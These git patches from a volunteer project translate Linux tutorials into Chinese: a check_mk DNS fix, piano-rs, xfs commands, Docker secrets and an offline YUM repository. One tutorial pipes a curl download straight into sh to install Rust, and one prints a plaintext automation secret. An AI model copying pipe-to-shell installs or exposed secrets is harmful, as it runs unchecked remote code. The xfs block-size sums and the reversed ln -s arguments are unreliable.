-`-H` is Host name to fetch agent for
-`-p` is protocol Either http or https (default is https)
-`-U` User-ID of a user who is allowed to download the agent.
-`-S` is secret. Automation secret of that user (in case of automation user)
-From error you can figure out that command is not able to resolve monitoring server DNS name `monitor.kerneltalks.com`
-
-### Solution :
-
-Its pretty simple. Check `/etc/resolv.conf` to make sure that you have proper DNS server entry for your environment. If it still dosnt resolve issue then you can add entry in [/etc/hosts][3] for it.
-
-```
-root@kerneltalks# cat /etc/hosts
-10.0.10.9 monitor.kerneltalks.com
-```
-
-Thats it. You would be able to register now successfully.
-
-```
-root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
-Going to register agent at deployment server
-Successfully registered agent for deployment.
-You can now update your agent by running 'cmk-update-agent -v'
-Saved your registration settings to /etc/cmk-update-agent.state.
-```
-
-By the way you can directly use IP address for `-s` switch and get rid of all above jargon including error itself!
-
---------------------------------------------------------------------------------
-
-via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
-
-作者:[kerneltalks][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://kerneltalks.com
-[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
-[2]:https://www.nagios.org/
-[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
diff --git a/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
new file mode 100644
index 0000000000..03952c5750
--- /dev/null
+++ b/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
@@ -0,0 +1,61 @@
+如何解决 check_mk 出现 "Cannot fetch deployment URL via curl" 的错误
+======
+本文解释了 'ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。' 的原因及其解决方案。
+
+![ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。][1]
+
+check_mk 是一个帮你配置 [nagios][2] 监控服务器的工具。然后在配置其中一台机器时,我遇到了下面的错误:
+
+`ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。`
+
+该错误是在我使用下面命令尝试将该机器注册到监控服务器时发生的:
+
+```
+root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+```
+
+其中-
+
+`-s` 指明监控服务器
+`-i` 指定服务器上 Check_MK 站点的名称
+`-H` 指定 agent 所在的主机名
+`-p` 为协议,可以是 http 或 https (默认为 https)
+`-U` 允许下载 agent 的用户 ID
+`-S` 为密码。用户的自动操作密码(当是自动用户时)
+从错误中可以看出,命令无法解析监控服务器的 DNS 名称 `monitor.kerneltalks.com`
+
+### 解决方案:
+
+超级简单。检查 `/etc/resolv.conf`,确保你的 DNS 配置正确。如果还解决不了这个问题那么你可以直接在 [/etc/hosts][3] 中指明它的 IP。
+
+```
+root@kerneltalks# cat /etc/hosts
+10.0.10.9 monitor.kerneltalks.com
+```
+
+这就搞定了。你可能成功注册了。
+
+```
+root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+Going to register agent at deployment server
+Successfully registered agent for deployment.
+You can now update your agent by running 'cmk-update-agent -v'
+Saved your registration settings to /etc/cmk-update-agent.state.
+```
+
+另外,你也可以为 `-s` 直接指定 IP 地址,就没那么多事了!
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
+
+作者:[kerneltalks][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
+[2]:https://www.nagios.org/
+[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
From 66f54bdefa598024712076242f5d39e9edd78ce1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 01:01:45 +0800
Subject: [PATCH 279/371] translate done: 20171028 Let Us Play Piano In
Terminal Using Our PC Keyboard.md
---
...Piano In Terminal Using Our PC Keyboard.md | 41 +++++++++----------
1 file changed, 20 insertions(+), 21 deletions(-)
rename {sources => translated}/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md (60%)
diff --git a/sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md b/translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
similarity index 60%
rename from sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
rename to translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
index 13b40af238..9da14a545e 100644
--- a/sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
+++ b/translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
@@ -1,18 +1,17 @@
-translating by lujun9972
-Let Us Play Piano In Terminal Using Our PC Keyboard
+让我们使用 PC 键盘在终端演奏钢琴
======
-Feel bored at work? Come on guys, let us play Piano! Yeah, you read it right. Who needs a real Piano? We can now play or learn how to play Piano from command line using our PC keyboard. Meet **Piano-rs** - a simple utility, written in Rust programming language, that allows you to play the Piano in Terminal using PC keyboard. It is free, open source and licensed under MIT license. You can use it on any operating systems that supports Rust.
+厌倦了工作?那么来吧,让我们弹弹钢琴!是的,你没有看错。谁需要真的钢琴啊?我们可以用 PC 键盘在命令行下就能弹钢琴。向你们介绍一下 **Piano-rs** - 这是一款用 Rust 语言编写的,可以让你用 PC 键盘在终端弹钢琴的简单工具。它免费,开源,而且基于 MIT 协议。你可以在任何支持 Rust 的操作系统中使用它。
-### Piano-rs : Play Piano In Terminal Using Our PC Keyboard
+### Piano-rs:使用 PC 键盘在终端弹钢琴
-#### Installation
+#### 安装
-Make sure your system have Rust programming language installed. If you haven't installed Rust already, run the following command to install it.
+确保系统已经安装了 Rust 编程语言。若还未安装,运行下面命令来安装它。
```
curl https://sh.rustup.rs -sSf | sh
```
-The installer will ask whether you want to proceed the installation with default values or customize the installation or cancel the installation. I want to install it with default values, so I typed **1** (Number one).
+安装程序会问你是否默认安装还是自定义安装还是取消安装。我希望默认安装,因此输入 **1** (数字一)。
```
info: downloading installer
@@ -73,47 +72,47 @@ environment variable. Next time you log in this will be done automatically.
To configure your current shell run source $HOME/.cargo/env
```
-Log out or reboot your system to get updated the cargo's bin directory in your PATH variable.
+登出然后重启系统来将 cargo 的 bin 目录纳入 PATH 变量中。
-Verify if Rust has been properly installed or not:
+校验 Rust 是否正确安装:
```
$ rustc --version
rustc 1.21.0 (3b72af97e 2017-10-09)
```
-Great! Rust is installed successfully. It is time build piano-rs application.
+太棒了!Rust 成功安装了。是时候构建 piano-rs 应用了。
-Git clone the Piano-rs repository using the following command:
+使用下面命令克隆 Piano-rs 仓库:
```
git clone https://github.com/ritiek/piano-rs
```
-The above command will create a directory called "piano-rs" in the current working directory and download all contents in it. Change to that directory:
+上面命令会在当前工作目录创建一个名为 "piano-rs" 的目录并下载所有内容到其中。进入该目录:
```
cd piano-rs
```
-Finally, run the following command to build Piano-rs:
+最后,运行下面命令来构建 Piano-rs:
```
cargo build --release
```
-The compiling process will take a while.
+编译过程要花上一阵子。
#### Usage
-Once the compilation process finished, run the following command from **piano-rs** directory:
+编译完成后,在 **piano-rs** 目录中运行下面命令:
```
./target/release/piano-rs
```
-Here is our Piano keyboard in Terminal! It is time play some notes. Press the keys to play the notes. Use **LEFT/RIGHT** arrow keys to adjust note frequency while playing. And, use **UP/Down** arrows to adjust note duration while playing.
+这就我们在终端上的钢琴键盘了!可以开始弹指一些音符了。按下按键可以弹奏相应音符。使用 **左/右** 方向键可以在弹奏时调整音频。而,使用 **上/下** 方向键可以在弹奏时调整音长。
[![][1]][2]
-Piano-rs uses the same notes and key bindings as [**multiplayerpiano.com**][3]. Alternatively, use [**these notes**][4] to learn to play various popular songs.
+Piano-rs 使用与 [**multiplayerpiano.com**][3] 一样的音符和按键。另外,你可以使用[**这些音符 **][4] 来学习弹指各种流行歌曲。
-To view the help section. type:
+要查看帮助。输入:
```
$ ./target/release/piano-rs -h
```
@@ -135,11 +134,11 @@ OPTIONS:
-s, --sequence Frequency sequence from 0 to 5 to begin with (Default: 2)
```
-I must admit that it is a super cool project. For those who couldn't afford to buy a Piano, use this application.
+我必须承认这是个超级酷的项目。对于那些买不起钢琴的人,很推荐使用这款应用。
-Have fun and happy weekend!!
+祝你周末愉快!!
-Cheers!
+此致敬礼!
From 0605b18698836319a04f017dda37d6be3ff40c91 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 09:58:49 +0800
Subject: [PATCH 280/371] translate done: 20180102 xfs file system commands
with examples.md
---
... xfs file system commands with examples.md | 46 +++++++++----------
1 file changed, 21 insertions(+), 25 deletions(-)
rename {sources => translated}/tech/20180102 xfs file system commands with examples.md (67%)
diff --git a/sources/tech/20180102 xfs file system commands with examples.md b/translated/tech/20180102 xfs file system commands with examples.md
similarity index 67%
rename from sources/tech/20180102 xfs file system commands with examples.md
rename to translated/tech/20180102 xfs file system commands with examples.md
index c0f834dba6..4b9e878279 100644
--- a/sources/tech/20180102 xfs file system commands with examples.md
+++ b/translated/tech/20180102 xfs file system commands with examples.md
@@ -4,11 +4,11 @@ xfs file system commands with examples
![Learn xfs commands with examples][1]
-In our another article we walked you through [what is xfs, features of xfs etc][2]. In this article we will see some frequently used xfs administrative commands. We will see how to create xfs filesystem, how to grow xfs filesystem, how to repair xfs file system and check xfs filesystem along with command examples.
+在我们另一篇文章中,我带您领略了一下[什么事 xfs,xfs 的相关特性等内容 ][2]。本文我们来看一些常用的 xfs 管理命令。我们将会通过几个例子来讲解如何创建 xfs 文件系统,如何对 xfs 文件系统进行扩容,如何检测并修复 xfs 文件系统。
-### Create XFS filesystem
+### 创建 XFS 文件系统
-`mkfs.xfs` command is used to create xfs filesystem. Without any special switches command output looks like one below -
+`mkfs.xfs` 命令用来创建 xfs 文件系统。无需任何特别的参数,其输出如下:
```
root@kerneltalks # mkfs.xfs /dev/xvdf
meta-data=/dev/xvdf isize=512 agcount=4, agsize=1310720 blks
@@ -22,11 +22,11 @@ log =internal log bsize=4096 blocks=2560, version=2
realtime =none extsz=4096 blocks=0, rtextents=0
```
-> Note : Once XFS filesystem is created it can not be reduced. It can only be extended to bigger size.
+> 注意:一旦 XFS 文件系统创建完毕就不能在缩容而只能进行扩容了。
-### Resize XFS file system
+### 调整 XFS 文件系统容量
-In XFS, you can only extend file system and can not reduce it. To grow XFS file system use `xfs_growfs`. You need to specify new size of mount point along with `-D` switch. `-D` takes argument number as file system blocks. If you dont supply `-D` switch, `xfs_growfs` will grow filesystem to maximum available limit on that device.
+你职能对 XFS 进行扩容而不能缩容。我们使用 `xfs_growfs` 来进行扩容。你需要使用 `-D` 参数指定挂载点的新容量。`-D` 接受一个数字的参数,指定文件系统块的数量。若你没有提供 `-D` 参数,则 `xfs_growfs` 会将文件系统扩到最大。
```
root@kerneltalks # xfs_growfs /dev/xvdf -D 256
@@ -42,7 +42,7 @@ realtime =none extsz=4096 blocks=0, rtextents=0
data size 256 too small, old size is 2883584
```
-In above output, observe last line. Since I supplied new size smaller than the existing size, `xfs_growfs`didnt change filesystem. This show you can not reduce XFS file system. You can only extend it.
+观察上面的输出中的最后一行。由于我分配的容量要小于现在的容量。它告诉你不能缩减 XFS 文件系统。你只能对他进行扩展。
```
root@kerneltalks # xfs_growfs /dev/xvdf -D 2883840
@@ -58,17 +58,17 @@ realtime =none extsz=4096 blocks=0, rtextents=0
data blocks changed from 2883584 to 2883840
```
-Now, I supplied new size 1GB extra and it successfully grew the file system.
+现在我多分配了 1GB 的空间,而且也成功地扩增了容量。
- **1GB blocks calculation :**
+ **1GB 块的计算方式:**
-Current filesystem has bsize=4096 i.e. block size of 4MB. We need 1 GB i.e. 256 blocks. So add 256 in current number of blocks i.e. 2883584 which gives you 2883840\. So I used 2883840 as argument to `-D` switch.
+当前文件系统 bsize 为 4096,意思是块的大小为 4MB。我们需要 1GB,也就是 256 个块。因此在当前块数,2883584 上加上 256 得到 2883840。因此我为 `-D` 传递参数 2883840。
-### Repair XFS file system
+### 修复 XFS 文件系统
-File system consistency check and repair of XFS can be performed using `xfs_repair` command. You can run command with `-n` switch so that it will not modify anything on filesystem. It will only scans and reports which modification to be done. If you are running it without -n switch, it will modify file system wherever necessary to make it clean.
+可以使用 `xfs_repair` 命令进行文件系统一致性检查和修复。使用 `-n` 参数则并不对文件系统做出什么实质性的修改。它只会搜索并报告要做哪些修改。若不带 `-n` 参数,则会修改文件系统以保证文件系统的纯净。
-Please note that you need to un-mount XFS filesystem before you can run checks on it. Otherwise you will see below error.
+请注意,在检查之前,你需要先卸载 XFS 文件系统。否则会报错。
```
root@kerneltalks # xfs_repair -n /dev/xvdf
@@ -77,7 +77,7 @@ xfs_repair: /dev/xvdf contains a mounted and writable filesystem
fatal error -- couldn't initialize XFS library
```
-Once successfully un-mounting file system you can run command on it.
+卸载后运行检查命令。
```
root@kerneltalks # xfs_repair -n /dev/xvdf
Phase 1 - find and verify superblock...
@@ -111,11 +111,7 @@ Phase 7 - verify link counts...
No modify flag set, skipping filesystem flush and exiting.
```
-In above output you can observe, in each phase command shows possible modification which can be done to make file system healthy. If you want command to do those modification during scan then run command without any switch.
-
-```
-xfs_repair output
-```
+你可以看到,命令在每个阶段都显示出了为了文件系统变得健康可能做出的修改。若你希望命令在扫描时实际应用这些修改,则不带任何参数运行命令即可。
```
root @ kerneltalks # xfs_repair /dev/xvdf
@@ -153,18 +149,18 @@ Phase 7 - verify and correct link counts . . .
done
```
-In above output you can observer `xfs_repair` command is executing possible filesystem modification as well to make it healthy.
+你会发现 `xfs_repair` 命令对文件系统做出了修改让其变得健康。
-### Check XFS version and details
+### 查看 XFS 版本以及它的详细信息
-Checking xfs file system version is easy. Run `xfs_info` command with `-V` switch on mount point.
+查看 xfs 文件系统版本很简单。使用 `-V` 参数运行 `xfs_info` 再加上挂载点就行了。
```
root@kerneltalks # xfs_info -V /shrikant
xfs_info version 4.5.0
```
-To view details of XFS file system like block size and number of blocks which helps you in calculating new block number for growing XFS file system, use `xfs_info` without any switch.
+若要查看 XFS 文件系统的详细信息,比如想计算扩容 XFS 文件系统时要新增多少个块,需要了解块大小,块的个数等信息,则不带任何选项运行 `xfs_info` 加上挂载点。
```
root@kerneltalks # xfs_info /shrikant
@@ -179,9 +175,9 @@ log =internal bsize=4096 blocks=2560, version=2
realtime =none extsz=4096 blocks=0, rtextents=0
```
-It displays all details as it shows while creating XFS file system
+则会显示 XFS 文件系统的所有详细信息,就跟创建 XFS 文件系统时显示的信息一样。
-There are another XFS file system management commands which alters and manages its metadata. We will cover them in another article.
+此外还有一些 XFS 文件系统管理命令可以修改并管理 XFS 的元数据。我们将在另一篇文章中来讲解。
--------------------------------------------------------------------------------
From 344e6a923b3d96f6ee6cd6e1a7edf5fb4c02d734 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 10:03:44 +0800
Subject: [PATCH 281/371] translate done: 20180102 xfs file system commands
with examples.md
---
.../tech/20180102 xfs file system commands with examples.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/translated/tech/20180102 xfs file system commands with examples.md b/translated/tech/20180102 xfs file system commands with examples.md
index 4b9e878279..940676dc7a 100644
--- a/translated/tech/20180102 xfs file system commands with examples.md
+++ b/translated/tech/20180102 xfs file system commands with examples.md
@@ -1,5 +1,4 @@
-translating by lujun9972
-xfs file system commands with examples
+通过案例学习 xfs 文件系统相关命令
======
![Learn xfs commands with examples][1]
From 0b41637a31535a695df9c53c79813abeb4779b41 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 10:22:32 +0800
Subject: [PATCH 282/371] PRF:20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@imquanquan 我又复校了一遍,有你帮我初校,省心多了。@HardworkFish
---
...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 52 +++++++------------
1 file changed, 20 insertions(+), 32 deletions(-)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 418a43bd00..e8434a1920 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -1,36 +1,35 @@
-
-Dockers 涉密信息(Secrets)管理介绍
+Docker 涉密信息管理介绍
====================================
-容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
+容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,它们相互作用构成本质上更安全的应用程序。
- ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
+![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
-构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
+构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、令牌、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker Secrets,这是一个容器原生的解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 将嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序是动态的,可以跨越多种环境移植。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,在不安全的、土造的方案中(如将涉密信息嵌入到 GitHub 这样的版本控制系统或者同样糟糕的其它方案),这种情况十分常见。
-### Docker 涉密信息(Secrets)管理介绍
+### Docker 涉密信息管理介绍
-根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在空余的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
+根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在不用的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
-通过将涉密信息整合到 Docker 的业务流程,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
+通过将涉密信息整合到 Docker 编排,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
-下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
+下图提供了一个高层次视图,并展示了 Docker swarm 模式体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
- ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
+![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
-在 Docker 中,一个涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
+在 Docker 中,涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入 swarm 集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的[内置证书颁发机构][17],Docker 通过相互认证的 TLS 连接将密钥发送给 swarm 集群管理器。
```
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保从来不会把任何涉密信息数据写入未加密的磁盘。将涉密信息写入到内部存储,赋予了涉密信息跟其它 swarm 集群数据一样的高可用性。
-当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
+当 swarm 集群管理器启动时,包含涉密信息的加密 Raft 日志通过每一个节点独有的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点 TLS 证书可以使用一个集群级的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理员可以访问被存储的所有涉密信息)会通过已经建立的TLS连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理员提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理器可以访问被存储的所有涉密信息)会通过已经建立的 TLS 连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理器提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
@@ -54,38 +53,27 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker Secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
-
-[Get safer apps for dev and ops w/ new #Docker secrets management][5]
-
-[CLICK TO TWEET][6]
-
-###
-![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
+查看 [Docker Secret 文档][18]以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别感谢 [Laurens Van Houtven](https://www.lvh.io/) 与 Docker 安全和核心团队合作使这一特性成为现实。
### 通过 Docker 更安全地使用应用程序
-Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密信息,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
+Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件,涉密信息、网络和数据卷都将加密并安全地与应用程序一起传输。
更多相关学习资源:
-* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7]
-
-* [下载 Docker ][8] 且开始学习
-
+* [1.13 Docker 数据中心具有 Secrets、安全扫描、容量缓存等新特性][7]
+* [下载 Docker][8] 且开始学习
* [在 Docker 数据中心尝试使用 secrets][9]
-
* [阅读文档][10]
-
* 参与 [即将进行的在线研讨会][11]
--------------------------------------------------------------------------------
via: https://blog.docker.com/2017/02/docker-secrets-management/
-作者:[ Ying Li][a]
+作者:[Ying Li][a]
译者:[HardworkFish](https://github.com/HardworkFish)
-校对:[imquanquan](https://github.com/imquanquan)
+校对:[imquanquan](https://github.com/imquanquan), [wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From f7f88d3a42a5d1c14f4dcf0f54f776d76aff017d Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 10:23:33 +0800
Subject: [PATCH 283/371] PUB:20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@HardwordFish @imquanquan https://linux.cn/article-9229-1.html
---
.../20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md (100%)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/published/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
similarity index 100%
rename from translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
rename to published/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
From d7579c0f9d4b6c38d68c5e681b574a38ad233c91 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 11:05:44 +0800
Subject: [PATCH 284/371] translate done: 20180103 Creating an Offline YUM
repository for LAN.md
---
...ating an Offline YUM repository for LAN.md | 111 ------------------
...ating an Offline YUM repository for LAN.md | 108 +++++++++++++++++
2 files changed, 108 insertions(+), 111 deletions(-)
delete mode 100644 sources/tech/20180103 Creating an Offline YUM repository for LAN.md
create mode 100644 translated/tech/20180103 Creating an Offline YUM repository for LAN.md
diff --git a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
deleted file mode 100644
index 315da3efbd..0000000000
--- a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
+++ /dev/null
@@ -1,111 +0,0 @@
-translating by lujun9972
-Creating an Offline YUM repository for LAN
-======
-In our earlier tutorial, we discussed " **[How we can create our own yum repository with ISO image& by mirroring an online yum repository][1]** ". Creating your own yum repository is a good idea but not ideal if you are only using 2-3 Linux machines on your network. But it definitely has advantages when you have large number of Linux servers on your network that are updated regularly or when you have some sensitive Linux machines that can't be exposed to Internet directly.
-
-When we have large number of Linux systems & each system is updating directly from internet, data consumed will be enormous. In order to save the data, we can create an offline yum & share it over our Local network. Other Linux machines on network will then fetch system updates directly from this Local yum, thus saving data & also transfer speed also be very good since we will be on our local network.
-
-We can share our yum repository using any of the following or both methods:
-
- * **Using Web Server (Apache)**
- * **Using ftp (VSFTPD)**
-
-
-
-We will be discussing both of these methods but before we start, you should create a YUM repository using my earlier tutorial ( **[READ HERE][1]** )
-
-
-## Using Web Server
-
-Firstly we need to install web-server (Apache) on our yum server which has IP address **192.168.1.100**. Since we have already configured a yum repository for this system, we will install apache web server using yum command,
-
-```
-$ yum install httpd
-```
-
-Next, we need to copy all the rpm packages to default apache root directory i.e. **/var/www/html** or since we have already copied our packages to **/YUM** , we can create a symbolic link from /var/www/html to /YUM
-
-```
-$ ln -s /var/www/html/Centos /yum
-```
-
-Restart you web-server to implement changes
-
-```
-$ systemctl restart httpd
-```
-
-
-### Configuring client machine
-
-Configurations for sharing Yum repository on server side are complete & now we will configure our client machine, with an IP address **192.168.1.101** , to receive updates from our created offline yum.
-
-Create a file named **offline-yum.repo** in **/etc/yum.repos.d** folder & enter the following details,
-
-```
-$ vi /etc/yum.repos.d/offline-yum.repo
-```
-
-```
-name=Local YUM
-baseurl=http://192.168.1.100/CentOS/7
-gpgcheck=0
-enabled=1
-```
-
-We have configured your Linux machine to receive updates over LAN from your offline yum repository. To confirm if the repository is working fine, try to install/update packages using yum command.
-
-## Using FTP server
-
-For sharing our YUM over ftp, we will firstly install the required package i.e vsftpd
-
-```
-$ yum install vsftpd
-```
-
-Default root directory for vsftp is /var/ftp/pub, so either copy rpm packages to this folder or create a symbolic link from /var/ftp/pub,
-
-```
